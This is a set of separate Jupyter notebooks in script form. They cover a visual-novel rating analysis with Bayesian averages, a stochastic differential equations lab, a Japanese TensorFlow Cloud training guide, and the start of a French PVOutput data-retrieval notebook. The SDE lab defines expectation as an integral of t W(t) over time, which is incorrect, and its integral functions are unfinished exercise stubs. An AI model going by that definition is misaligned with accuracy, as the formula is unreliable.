# + id="n_FyRDBCAtNu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="30422bea-66f1-4436-ac0f-cf778f8e4906"
# Let's try to plot the number of votes per VN
vote_cnt = finished.groupby('vid').count()['vote']
fig, ax = plt.subplots(figsize=(10, 8))
ax.set(yscale="log")
sns.distplot(vote_cnt, kde=False)
ax.set_title("VN Vote Count Distribution")
ax.set_xlabel("Vote Counts Per VN")
plt.show()
# + id="msvxdZk8QtaR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 238} outputId="a61a9ff1-e614-47fc-d985-4f0501ca74ac"
# Finding the Highest Rated VNs based on mean ratings
best_vns = finished.groupby("vid").agg(["count", "mean"])["vote"]
best_vns = best_vns.sort_values(by="mean", ascending=False)
best_vns.head()
# + id="UhDBu34LQtaa" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 534} outputId="c174042d-1c02-488e-9f7f-9731703d3b5e"
fig, ax = plt.subplots(figsize=(10, 8))
best_vns.plot(x="count", y="mean", kind="hexbin", xscale="log", cmap="YlGnBu", gridsize=12, ax=ax)
ax.set_title("Simple Rating Mean Vs Rating Count for VNs")
ax.set_xlabel("Count")
ax.set_ylabel("Mean")
plt.show()
# + id="plbHR_J0Qtan" colab_type="code" colab={}
# Simple means results in heavy tails (high ratings with very few voters)
# + id="Ira1jiVxQtar" colab_type="code" colab={}
# Instead use Bayesian Rating
avg_rating = finished.groupby("vid").agg(["count", "mean"])["vote"]
avg_vote = finished["vote"].mean()
avg_count = avg_rating["count"].mean()
w = avg_rating["count"] / (avg_rating["count"] + avg_count)
avg_rating["bayes_rating"] = (w * avg_rating["mean"]) + (1-w)*avg_vote
# + id="DKj-ZCDlQta1" colab_type="code" colab={}
avg_rating.sort_values(by="bayes_rating", ascending=False, inplace=True)
# + id="FXEnFLQ6Qta8" colab_type="code" colab={}
# Reading vn data to show titles
vn = pd.read_sql("SELECT id, title from vn", con=engine)
vn.set_index("id", inplace=True)
# + id="bl5kemNuQtbD" colab_type="code" colab={}
best_vns = avg_rating.join(vn, how='left')
# + id="PUKfVD8KQtbL" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 394} outputId="9c5910a8-e246-4447-e1d7-19886ba5a9af"
best_vns.head(10)
# + id="eZVQyQ9AQtbR" colab_type="code" colab={}
# Alternative Bayesian rating (custom setting)
C = 500 # variable count
m = 85 # variable mean
best_vns = finished.groupby("vid").agg(["count", "sum", "mean"])["vote"]
best_vns["bayes_rating"] = (C*m + best_vns["sum"])/(C + best_vns["count"])
best_vns.sort_values(by="bayes_rating", ascending=False, inplace=True)
best_vns = best_vns.join(vn, how="left")
# + id="qURl7I96QtbZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 394} outputId="e599420a-2823-4472-b974-a1bd494d0203"
best_vns.head(10)
# + id="zqekUhrsQtbm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="f5b99ef1-1a36-4980-cc18-6d3b5eaeedd9"
fig, ax = plt.subplots(figsize=(10, 8))
best_vns.plot(x="count", y="bayes_rating", kind="hexbin", xscale="log", cmap="YlGnBu", gridsize=12, ax=ax)
ax.set_title("Simple Rating Mean Vs Rating Count for VNs")
ax.set_xlabel("Count")
ax.set_ylabel("Mean")
plt.show()
|
vndb_eda.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Stochastic Differential Equations: Lab 1
from IPython.core.display import HTML
css_file = 'https://raw.githubusercontent.com/ngcm/training-public/master/ipython_notebook_styles/ngcmstyle.css'
HTML(url=css_file)
# This background for these exercises is article of <NAME>, [*An Algorithmic Introduction to Numerical Simulation of Stochastic Differential Equations*, SIAM Review 43:525-546 (2001)](http://epubs.siam.org/doi/abs/10.1137/S0036144500378302).
# Higham provides Matlab codes illustrating the basic ideas at <http://personal.strath.ac.uk/d.j.higham/algfiles.html>, which are also given in the paper.
# For random processes in `python` you should look at the `numpy.random` module. To set the initial seed (which you should *not* do in a real simulation, but allows for reproducible testing), see `numpy.random.seed`.
# ## Brownian processes
# A *random walk* or *Brownian process* or *Wiener process* is a way of modelling error introduced by uncertainty into a differential equation. The random variable representing the walk is denoted $W$. A single realization of the walk is written $W(t)$. We will assume that
#
# 1. The walk (value of $W(t)$) is initially (at $t=0$) $0$, so $W(0)=0$, to represent "perfect knowledge" there;
# 2. The walk is *on average* zero, so $\mathbb{E}[W(t+h) - W(t)] = 0$, where the *expectation value* is
# $$
# \mathbb{E}[W] = \int_{-\infty}^{\infty} t W(t) \, \text{d}t
# $$
# 3. Any step in the walk is independent of any other step, so $W(t_2) - W(t_1)$ is independent of $W(s_2) - W(s_1)$ for any $s_{1,2} \ne t_{1,2}$.
#
# These requirements lead to a definition of a *discrete* random walk: given the points $\{ t_i \}$ with $i = 0, \dots, N$ separated by a uniform timestep $\delta t$, we have - for a single realization of the walk - the definition
# $$
# \begin{align}
# \text{d}W_i &= \sqrt{\delta t} {\cal N}(0, 1), \\
# W_i &= \left( \sum_{j=0}^{i-1} \text{d}W_j \right), \\
# W_0 &= 0
# \end{align}
# $$
# Here ${\cal N}(0, 1)$ means a realization of a normally distributed random variable with mean $0$ and standard deviation $1$: programmatically, the output of `numpy.random.randn`.
# When working with discrete Brownian processes, there are two things we can do.
#
# 1. We can think about a *single realization* at different timescales, by averaging over more points. E.g.
# $$
# W_i = \left( \sum_{j=0}^{i_1} \sum_{k=0}^{p} \text{d}W_{(p j + k)} \right)
# $$
# is a Brownian process with timestep $p \, \delta t$.
# 2. We can think about *multiple realizations* by computing a new set of steps $\text{d}W$, whilst at the same timestep.
#
# Both viewpoints are important.
# ### Tasks
# 1. Simulate a single realization of a Brownian process over $[0, 1]$ using a step length $\delta t = 1/N$ for $N = 500, 1000, 2000$. Use a fixed seed of `100`. Compare the results.
# 2. Simulation different realizations of a Brownian process with $\delta t$ of your choice. Again, compare the results.
# %matplotlib inline
import numpy
from matplotlib import pyplot
from matplotlib import rcParams
rcParams['font.family'] = 'serif'
rcParams['font.size'] = 16
rcParams['figure.figsize'] = (12,6)
from scipy.integrate import quad
# Evaluate the function $u(W(t)) = \sin^2(t + W(t))$, where $W(t)$ is a Brownian process, on $M$ Brownian paths for $M = 500, 1000, 2000$. Compare the *average* path for each $M$.
# The average path at time $t$ should be given by
# $$
# \begin{equation}
# \int_{-\infty}^{\infty} \frac{\sin(t+s)^2 \exp(-s^2 / 2t)}{\sqrt{2 \pi t}} \,\text{d}s.
# \end{equation}
# $$
# +
# This computes the exact solution!
t_int = numpy.linspace(0.005, numpy.pi, 1000)
def integrand(x,t):
return numpy.sin(t+x)**2*numpy.exp(-x**2/(2.0*t))/numpy.sqrt(2.0*numpy.pi*t)
int_exact = numpy.zeros_like(t_int)
for i, t in enumerate(t_int):
int_exact[i], err = quad(integrand, -numpy.inf, numpy.inf, args=(t,))
# -
# ## Stochastic integrals
# We have, in eg finite elements or multistep methods for IVPs, written the solution of differential equations in terms of integrals. We're going to do the same again, so we need to integrate random variables. The integral of a random variable *with respect to a Brownian process* is written
# $$
# \int_0^t G(s) \, \text{d}W_s,
# $$
# where the notation $\text{d}W_s$ indicates that the step in the Brownian process depends on the (dummy) independent variable $s$.
#
# We'll concentrate on the case $G(s) = W(s)$, so we're trying to integrate the Brownian process itself. If this were a standard, non-random variable, the answer would be
# $$
# \int_0^t W(s) \, \text{d}W_s = \frac{1}{2} \left( W(t)^2 - W(0)^2 \right).
# $$
#
# When we approximate the quadrature numerically than we would split the interval $[0, T]$ into strips (subintervals), approximate the integral on each subinterval by picking a point inside the interval, evaluating the integrand at that point, and weighting it by the width of the subinterval. In normal integration it doesn't matter which point within the subinterval we choose.
#
# In the stochastic case that is not true. We pick a specific point $\tau_i = a t_i + (1-a) t_{i-1}$ in the interval $[t_{i-1}, t_i]$. The value $a \in [0, 1]$ is a constant that says where within each interval we are evaluating the integrand. We can then approximate the integral by
#
# \begin{equation}
# \int_0^T W(s) \, dW_s = \sum_{i=1}^N W(\tau_i) \left[ W(t_i) - W(t_{i-1}) \right] = S_N.
# \end{equation}
#
# Now we can compute (using that the expectation of the products of $W$ terms is the covariance, which is the minimum of the arguments)
#
# \begin{align}
# \mathbb{E}(S_N) &= \mathbb{E} \left( \sum_{i=1}^N W(\tau_i) \left[ W(t_i) - W(t_{i-1}) \right] \right) \\
# &= \sum_{i=1}^N \mathbb{E} \left( W(\tau_i) W(t_i) \right) - \mathbb{E} \left( W(\tau_i) W(t_{i-1}) \right) \\
# &= \sum_{i=1}^N (\min\{\tau_i, t_i\} - \min\{\tau_i, t_{i-1}\}) \\
# &= \sum_{i=1}^N (\tau_i - t_{i-1}) \\
# &= (t - t_0) a.
# \end{align}
#
# The choice of evaluation point **matters**.
# So there are multiple different stochastic integrals, each (effectively) corresponding to a different choice of $a$. The two standard choices are
# There are two standard choices of stochastic integral.
#
# 1. Ito: choose $a=0$.
# 2. Stratonovich: choose $a=1/2$.
#
# These lead to
# $$
# \int_0^t G(s) \, \text{d}W_s \simeq_{\text{Ito}} \sum_{j=0}^{N-1} G(s_j, W(s_j)) \left( W(s_{j+1}) - W(s_j) \right) = \sum_{j=0}^{N-1} G(s_j) \text{d}W(s_{j})
# $$
# for the Ito integral, and
# $$
# \int_0^t G(s) \, \text{d}W_s \simeq_{\text{Stratonovich}} \sum_{j=0}^{N-1} \frac{1}{2} \left( G(s_j, W(s_j)) + G(s_{j+1}, W(s_{j+1})) \right) \left( W(s_{j+1}) - W(s_j) \right) = \sum_{j=0}^{N-1} \frac{1}{2} \left( G(s_j, W(s_j)) + G(s_{j+1}, W(s_{j+1})) \right) \text{d}W(s_{j}).
# $$
# for the Stratonovich integral.
# ### Tasks
# Write functions to compute the Itô and Stratonovich integrals of a function $h(t, W(t))$ of a *given* Brownian process $W(t)$ over the interval $[0, 1]$.
def ito(h, trange, dW):
"""Compute the Ito stochastic integral given the range of t.
Parameters
----------
h : function
integrand
trange : list of float
the range of integration
dW : array of float
Brownian increments
seed : integer
optional seed for the Brownian path
Returns
-------
ito : float
the integral
"""
return ito
def stratonovich(h, trange, dW):
"""Compute the Stratonovich stochastic integral given the range of t.
Parameters
----------
h : function
integrand
trange : list of float
the range of integration
dW : array of float
the Brownian increments
Returns
-------
stratonovich : float
the integral
"""
return stratonovich
# Test the functions on $h = W(t)$ for various $N$. Compare the limiting values of the integrals.
# ## Euler-Maruyama's method
# Now we can write down a stochastic differential equation.
#
# The differential form of a stochastic differential equation is
# $$
# \frac{\text{d}X}{\text{d}t} = f(X) + g(X) \frac{\text{d}W}{\text{d}t}
# $$
# and the comparable (and more useful) *integral form* is
# $$
# \text{d}X = f(X) \, \text{d}t + g(X) \text{d}W.
# $$
# This has formal solution
# $$
# X(t) = X_0 + \int_0^t f(X(s)) \, \text{d}s + \int_0^t g(X(s)) \, \text{d}W_s.
# $$
# We can use our Ito integral above to write down the *Euler-Maruyama method*
#
# $$
# X(t+h) \simeq X(t) + h f(X(t)) + g(X(t)) \left( W(t+h) - W(t) \right) + {\cal{O}}(h^p).
# $$
#
# Written in discrete, subscript form we have
#
# $$
# X_{n+1} = X_n + h f_n + g_n \, \text{d}W_{n}
# $$
#
# The order of convergence $p$ is an interesting and complex question.
# ### Tasks
# Apply the Euler-Maruyama method to the stochastic differential equation
#
# $$
# \begin{equation}
# dX(t) = \lambda X(t) + \mu X(t) dW(t), \qquad X(0) = X_0.
# \end{equation}
# $$
#
# Choose any reasonable values of the free parameters $\lambda, \mu, X_0$.
#
# The exact solution to this equation is $X(t) = X(0) \exp \left[ \left( \lambda - \tfrac{1}{2} \mu^2 \right) t + \mu W(t) \right]$. Fix the timetstep and compare your solution to the exact solution.
# Vary the timestep of the Brownian path and check how the numerical solution compares to the exact solution.
# ## Convergence
# We have two ways of thinking about Brownian paths or processes.
#
# We can fix the path (ie fix $\text{d}W$) and vary the timescale on which we're looking at it: this gives us a single random path, and we can ask how the numerical method converges for this single realization. This is *strong convergence*.
#
# Alternatively, we can view each path as a single realization of a random process that should average to zero. We can then look at how the method converges as we average over a large number of realizations, *also* looking at how it converges as we vary the timescale. This is *weak convergence*.
#
# Formally, denote the true solution as $X(T)$ and the numerical solution for a given step length $h$ as $X^h(T)$. The order of convergence is denoted $p$.
#
# #### Strong convergence
#
# $$
# \mathbb{E} \left| X(T) - X^h(T) \right| \le C h^{p}
# $$
# For Euler-Maruyama, expect $p=1/2$!.
#
# #### Weak convergence
#
# $$
# \left| \mathbb{E} \left( \phi( X(T) ) \right) - \mathbb{E} \left( \phi( X^h(T) ) \right) \right| \le C h^{p}
# $$
# For Euler-Maruyama, expect $p=1$.
# ### Tasks
# Investigate the weak and strong convergence of your method, applied to the problem above.
|
FEEG6016 Simulation and Modelling/09-Stochastic-DEs-Lab-1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="b518b04cbfe0"
# ##### Copyright 2020 The TensorFlow Authors.
# + cellView="form" id="906e07f6e562"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] id="c359f002e834"
# # TensorFlow Cloud を使用した Keras モデルのトレーニング
# + [markdown] id="f5c893a15fac"
# <table class="tfo-notebook-buttons" align="left">
# <td><a target="_blank" href="https://www.tensorflow.org/guide/keras/training_keras_models_on_cloud"><img src="https://www.tensorflow.org/images/tf_logo_32px.png">TensorFlow.org で実行</a></td>
# <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/ja/guide/keras/training_keras_models_on_cloud.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png"> Google Colab で実行</a>
# </td>
# <td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/ja/guide/keras/training_keras_models_on_cloud.ipynb"> <img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png"> GitHubでソースを表示</a></td>
# <td> <a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/ja/guide/keras/training_keras_models_on_cloud.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png">ノートブックをダウンロード</a>
# </td>
# </table>
# + [markdown] id="b1c0246f8536"
# ## はじめに
#
# [TensorFlow Cloud](https://github.com/tensorflow/cloud) は、ローカルデバッグから Google Cloud 上の分散トレーニングにシームレスに移行する API を提供する Python パッケージです。クラウド上での TensorFlow モデルのトレーニングプロセスを単一のシンプルな関数呼び出しに簡素化して、必要なセットアップを最小限にし、モデルの変更を不要にしました。TensorFlow Cloud は、モデルの VM(仮想マシン)インスタンスや分散ストラテジーの作成など、クラウド固有のタスクを自動的に処理します。このガイドでは、TensorFlow Cloud を通じた Google Cloud とのインターフェース方法と、TensorFlow Cloud 内で提供する幅広い機能について説明します。まずは最もシンプルなユースケースから始めます。
# + [markdown] id="e015c75faba2"
# ## Setup
#
# TensorFlow Cloud をインストールし、このガイドで必要なパッケージのインポートから始めます。
# + id="99e5bc5e0ab8"
# !pip install -q tensorflow_cloud
# + id="26113effabca"
import tensorflow as tf
import tensorflow_cloud as tfc
from tensorflow import keras
from tensorflow.keras import layers
# + [markdown] id="e8568395c87b"
# ## API の概要:最初のエンドツーエンドの例
#
# まずは、以下のような CNN の Keras モデルのトレーニングスクリプトから始めましょう。
#
# ```python
# (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
#
# model = keras.Sequential(
# [
# keras.Input(shape=(28, 28)),
# # Use a Rescaling layer to make sure input values are in the [0, 1] range.
# layers.experimental.preprocessing.Rescaling(1.0 / 255),
# # The original images have shape (28, 28), so we reshape them to (28, 28, 1)
# layers.Reshape(target_shape=(28, 28, 1)),
# # Follow-up with a classic small convnet
# layers.Conv2D(32, 3, activation="relu"),
# layers.MaxPooling2D(2),
# layers.Conv2D(32, 3, activation="relu"),
# layers.MaxPooling2D(2),
# layers.Conv2D(32, 3, activation="relu"),
# layers.Flatten(),
# layers.Dense(128, activation="relu"),
# layers.Dense(10),
# ]
# )
#
# model.compile(
# optimizer=keras.optimizers.Adam(),
# loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),
# metrics=keras.metrics.SparseCategoricalAccuracy(),
# )
#
# model.fit(x_train, y_train, epochs=20, batch_size=128, validation_split=0.1)
# ```
# + [markdown] id="514f51a9a45d"
# インポートを始める前にスクリプトの最初に呼び出し `run()` を追加するだけで、このモデルのトレーニングが Google Cloud で行われるようになります。
#
# ```python
# tfc.run()
# ```
# + [markdown] id="6e38288bb617"
# TensorFlow Cloud の使用時には、VM インスタンスの作成や分散ストラテジーなど、クラウド固有のタスクの心配をする必要がありません。API のすべてのパラメータにはインテリジェントなデフォルトが含まれており、すべてのパラメータは構成可能ですが、多くのモデルはこれらのデフォルトに依存しています。
#
# `run()` を呼び出すと、TensorFlow Cloud は以下を実行します。
#
# - Python スクリプトやノートブックを分散可能な状態にします。
# - 上記を必要な依存関係を持つ Docker イメージに変換します。
# - GCP や GPU 搭載の VM 上でトレーニングジョブを実行します。
# - 関連するログやジョブ情報をストリーム化します。
#
# デフォルトの VM 構成は、チーフが 1 個とワーカーが 0 個、CPU 8 コアと Tesla T4 GPU 1 台です。
# + [markdown] id="3ab860e037c9"
# ## Google Cloud の構成
#
# 適切な Cloud のトレーニングの道筋をつけるためには、多少の新規セットアップが必要です。初めて Google Cloud を利用する場合は、いくらかの予備措置を講じる必要があります。
#
# 1. GCP プロジェクトを作成する
# 2. AI プラットフォームサービスを有効にする
# 3. サービスアカウントを作成する
# 4. 認証キーをダウンロードする
# 5. Cloud Storage バケットを作成する
#
# 初回セットアップに関する詳細な手順については、[TensorFlow Cloud README](https://github.com/tensorflow/cloud#setup-instructions) をご覧ください。追加のセットアップ例は [TensorFlow ブログ](https://blog.tensorflow.org/2020/08/train-your-tensorflow-model-on-google.html)に記載されています。
#
# ## 一般的なワークフローと Cloud Storage
#
# 大抵の場合は、Google Cloud でトレーニングを行った後にモデルを取得する必要があります。そのためには、リモートトレーニング中に保存と読み込みを Cloud Storage にリダイレクトすることが重要です。TensorFlow Cloud を Cloud Storage バケットに導いて、様々なタスクを行うことができます。ストレージバケットは、大規模なトレーニングデータセットの保存と読み込み、コールバックログやモデル重みの格納、トレーニングモデルファイルの保存に使用することが可能です。まず、`fit()` を構成してモデルを Cloud Storage に保存し、TensorBoard モニタリングをセットアップしてトレーニングの進捗状況をトラッキングしてみましょう。
# + id="af5077731187"
def create_model():
model = keras.Sequential(
[
keras.Input(shape=(28, 28)),
layers.experimental.preprocessing.Rescaling(1.0 / 255),
layers.Reshape(target_shape=(28, 28, 1)),
layers.Conv2D(32, 3, activation="relu"),
layers.MaxPooling2D(2),
layers.Conv2D(32, 3, activation="relu"),
layers.MaxPooling2D(2),
layers.Conv2D(32, 3, activation="relu"),
layers.Flatten(),
layers.Dense(128, activation="relu"),
layers.Dense(10),
]
)
model.compile(
optimizer=keras.optimizers.Adam(),
loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=keras.metrics.SparseCategoricalAccuracy(),
)
return model
# + [markdown] id="5f2e65d8f3a6"
# トレーニング中に生成された TensorBoard のログとモデルのチェックポイントをクラウド ストレージバケットに保存してみましょう。
# + id="fdc4f951281c"
import datetime
import os
# Note: Please change the gcp_bucket to your bucket name.
gcp_bucket = "keras-examples"
checkpoint_path = os.path.join("gs://", gcp_bucket, "mnist_example", "save_at_{epoch}")
tensorboard_path = os.path.join( # Timestamp included to enable timeseries graphs
"gs://", gcp_bucket, "logs", datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
)
callbacks = [
# TensorBoard will store logs for each epoch and graph performance for us.
keras.callbacks.TensorBoard(log_dir=tensorboard_path, histogram_freq=1),
# ModelCheckpoint will save models after each epoch for retrieval later.
keras.callbacks.ModelCheckpoint(checkpoint_path),
# EarlyStopping will terminate training when val_loss ceases to improve.
keras.callbacks.EarlyStopping(monitor="val_loss", patience=3),
]
model = create_model()
# + [markdown] id="45d6210176e6"
# ここでは、直接 Keras からデータをロードします。一般的にはデータセットをクラウドストレージのバケットに格納するのがベストプラクティスですが、TensorFlow Cloud はローカルに格納されているデータセットにも対応可能です。これについては、このガイドのマルチファイルに関するセクションで説明しています。
# + id="bd4ef6ffa611"
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
# + [markdown] id="b1d2a2688887"
# [TensorFlow Cloud](https://github.com/tensorflow/cloud) API は、ローカルとクラウド上のどちらでコードを実行するかを決める、`remote()` 関数を用意しています。これにより、`fit()` パラメータをローカル実行とリモート実行に分けて指定することができ、ローカルマシンに負荷をかけることなく容易にデバッグする手段を提供します。
# + id="cfab9ff41fd5"
if tfc.remote():
epochs = 100
callbacks = callbacks
batch_size = 128
else:
epochs = 5
batch_size = 64
callbacks = None
model.fit(x_train, y_train, epochs=epochs, callbacks=callbacks, batch_size=batch_size)
# + [markdown] id="9b27c0b3b7db"
# トレーニングが終了したら、モデルを GCS に保存しましょう。
# + id="b00451dcfeab"
save_path = os.path.join("gs://", gcp_bucket, "mnist_example")
if tfc.remote():
model.save(save_path)
# + [markdown] id="0dceb5b7a173"
# Docker イメージの構築には、ローカルの Docker インスタンスの代わりに、このストレージバケットを使用することもできます。`docker_image_bucket_name` パラメータにバケットを追加するだけで、これが可能になります。
# + id="13200523ed93"
# docs_infra: no_execute
tfc.run(docker_image_bucket_name=gcp_bucket)
# + [markdown] id="060a2112c34e"
# モデルをトレーニングした後は、保存したモデルを読み込み、パフォーマンスを監視するために TensorBoard のログを表示します。
# + id="b8d773e2cfb7"
# docs_infra: no_execute
model = keras.models.load_model(save_path)
# + id="05d1d68bae5a"
!#docs_infra: no_execute
# !tensorboard dev upload --logdir "gs://keras-examples-jonah/logs/fit" --name "Guide MNIST"
# + [markdown] id="3785ece03a8f"
# ## 大規模プロジェクト
#
# 多くの場合、Keras モデルを含むプロジェクトは複数の Python スクリプトを含んでいたり、外部データや特定の依存関係を必要としたりします。TensorFlow Cloud は、大規模デプロイメントに完全な柔軟性があり、プロジェクトを支援する多くのインテリジェントな機能を提供します。
#
# ### エントリーポイント:Python スクリプトと Jupyter ノートブックのサポート
#
# `run()` API を呼び出しても、それが必ずモデルトレーニングコードと同じ Python スクリプト内に含まれているとは限りません。そのため、`entry_point` パラメータを用意しています。`entry_point` パラメータは、モデルトレーニングコードが置かれている Python スクリプトやノートブックの指定に使用できます。モデルと同じスクリプトから `run()` を呼び出す場合は、`entry_point` のデフォルトである `None` を使用します。
#
# ### `pip` 依存関係
#
# プロジェクトが追加の `pip` 依存関係を呼び出す場合は、`requirements.txt` ファイルをインクルードして必要な追加のライブラリを指定することができます。このファイル内に必要な依存関係のリストを書き込むだけで、TensorFlow Cloud がそれらをクラウドビルドに統合する処理を行います。
#
# ### Python ノートブック
#
# TensorFlow Cloud は Python ノートブックからも実行可能です。さらに、指定した `entry_point` は必要に応じてノートブックにすることができます。ノートブック上の TensorFlow Cloud をスクリプトと比較した場合、念頭に置いておいた方がよい重要な違いが 2 点あります。
#
# - ノートブック内から `run()` を呼び出す際に、Docker イメージを構築して格納するために Cloud Storage バケットを指定する必要があります。
# - Google Cloud 認証はすべて認証キーを使用して行い、プロジェクトを指定する必要はありません。ノートブックから TensorFlow Cloud を使用するワークフローの例は、本ガイドの「すべてを統合する」セクションで紹介しています。
#
# ### マルチファイルプロジェクト
#
# モデルが追加ファイルに依存する場合、ここではそれらのファイルを必ず指定されたエントリポイントと同じディレクトリ(またはサブディレクトリ)に置くようにするだけです。指定した `entry_point` と同じディレクトリ内に格納されているすべてのファイルは、`entry_point` に隣接するサブディレクトリに格納されているファイルと同様に、Docker イメージにインクルードされます。これは `pip` では取得できない依存関係が必要な場合にも該当します。
#
# 追加の pip 依存関係を持つカスタムエントリーポイントとマルチファイルプロジェクトの例は、[TensorFlow Cloud Repository](https://github.com/tensorflow/cloud/tree/master/src/python/tensorflow_cloud/core/tests/examples/multi_file_example) にあるマルチファイルの例をご覧ください。簡潔にするために、ここでは例の `run()` 呼び出しのみをインクルードします。
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# entry_point="train_model.py",
# requirements="requirements.txt"
# )
# ```
# + [markdown] id="997e3f89c734"
# ## マシン構成と分散トレーニング
#
# モデルのトレーニングには、モデルやデータセットの大きさ次第で、幅広く異なったリソースを必要とする可能性があります。複数の GPU を使用した構成を考慮する場合、適合する[分散ストラテジー](https://www.tensorflow.org/guide/distributed_training)を選択することが重要になります。ここでは、可能性のある構成をいくつか概説します。
#
# ### マルチワーカー分散
#
# ここでは、`COMMON_MACHINE_CONFIGS`を使用して、チーフ CPU 1 個、ワーカー GPU 4 個を指定します。
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# chief_config=tfc.COMMON_MACHINE_CONFIGS['CPU'],
# worker_count=2,
# worker_config=tfc.COMMON_MACHINE_CONFIGS['T4_4X']
# )
# ```
#
# デフォルトでは、TensorFlow Cloudは提供された`chief_config`、`worker_config`、`worker_count`パラメータを使用する単純な式で、マシン構成に最適な分散ストラテジーを選択します。
#
# - 指定した GPU の数が 0 より大きい場合は、`tf.distribute.MirroredStrategy`が選択されます。
# - ワーカーの数が 0 より大きい場合は、アクセラレータの種類に応じて`tf.distribution.experimental.MultiWorkerMirroredStrategy`または`tf.distribution.experimental.TPUStrategy`が選択されます。
# - それ以外の場合は、`tf.distribute.OneDeviceStrategy`が選択されます。
# + [markdown] id="e0d938efab72"
# ### TPU 分散
#
# 以下のように TPU 上で同じモデルをトレーニングしてみましょう。
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# chief_config=tfc.COMMON_MACHINE_CONFIGS["CPU"],
# worker_count=1,
# worker_config=tfc.COMMON_MACHINE_CONFIGS["TPU"]
# )
# ```
# + [markdown] id="d1dec83a0b19"
# ### カスタム分散ストラテジー
#
# カスタム分散ストラテジーを指定するには、[分散トレーニングガイド](https://www.tensorflow.org/guide/distributed_training)に従って通常通りにコードをフォーマットし、`distribution_strategy` を `None` 設定にします。以下では、同じ MNIST モデルに独自の分散ストラテジーを指定します。
#
# ```python
# (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
#
# mirrored_strategy = tf.distribute.MirroredStrategy()
# with mirrored_strategy.scope():
# model = create_model()
#
# if tfc.remote():
# epochs = 100
# batch_size = 128
# else:
# epochs = 10
# batch_size = 64
# callbacks = None
#
# model.fit(
# x_train, y_train, epochs=epochs, callbacks=callbacks, batch_size=batch_size
# )
#
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# chief_config=tfc.COMMON_MACHINE_CONFIGS['CPU'],
# worker_count=2,
# worker_config=tfc.COMMON_MACHINE_CONFIGS['T4_4X'],
# distribution_strategy=None
# )
# ```
# + [markdown] id="0a50b62bf672"
# ## カスタム Docker イメージ
#
# デフォルトでは、TensorFlow Cloud は Google が提供する [Docker ベースイメージ](https://hub.docker.com/r/tensorflow/tensorflow/)を使用するので、現在の TensorFlow バージョンに対応します。しかし、必要に応じて構築要件に合わせたカスタム Docker イメージを指定することも可能です。この例では、古い TensorFlow バージョンから Docker イメージを指定します。
#
# ```python
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# base_docker_image="tensorflow/tensorflow:2.1.0-gpu"
# )
# ```
# + [markdown] id="bb659015ffad"
# ## その他のメトリクス
#
# Cloud ジョブに固有のラベルを付けたり、Cloud トレーニング中にモデルのログをストリーム化したりすると有用な場合があります。記録を管理できるように、すべての Cloud ジョブに適切なラベル付けをすることをお勧めします。そのために、`run()` は最大 64 ペアまでキーと値のラベルのディクショナリを受け入れることができ、これは Cloud のビルドログに表示されます。エポックのパフォーマンスやモデルの保存内部などに関するログは、`tfc.run` を実行して提供されるリンクを使用してアクセスするか、`stream_logs` フラグを使用してローカルターミナルに出力することが可能です。
#
# ```python
# job_labels = {"job": "mnist-example", "team": "keras-io", "user": "jonah"}
#
# tfc.run(
# docker_image_bucket_name=gcp_bucket,
# job_labels=job_labels,
# stream_logs=True
# )
# ```
# + [markdown] id="b34a2e8e09c3"
# ## すべてを統合する
#
# このガイドで説明した特徴の多くを用いた、さらに深い Colab については、[こちらの例](https://github.com/tensorflow/cloud/blob/master/src/python/tensorflow_cloud/core/tests/examples/dogs_classification.ipynb)に従って特徴抽出を使用し、写真から犬の品種を認識する最先端モデルのトレーニングを行います。
|
site/ja/guide/keras/training_keras_models_on_cloud.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Synopsis
# PURPOSE :
#
# Aller récupérer sur l'API de PVOutput.org les données d'une station cible:
# - données production "live" (cad pas de temps de 5min à 10min sans la météo) ==> Detail_PROD
# - données d'insolation (cad pas de temps de 5min à 10min sans la météo. Pas complètement clair si correspond exactement extraterestrial radiation) ==> Detail_INSOL
# - données production quotidienne (somme sur la journée, dispo aussi en mensuel etc. Ajoute un champ (catégoriel) sur la couverture nuageuse) ==> Aggreg_PROD
# PRINCIPE :
#
# Traitement successif des 3 types de requêtes (avec en bonus les carac de l'installation)
# - Formulation et test de la requêtes
# - Définition des dates:
# - Déterminer la liste des dates maximale
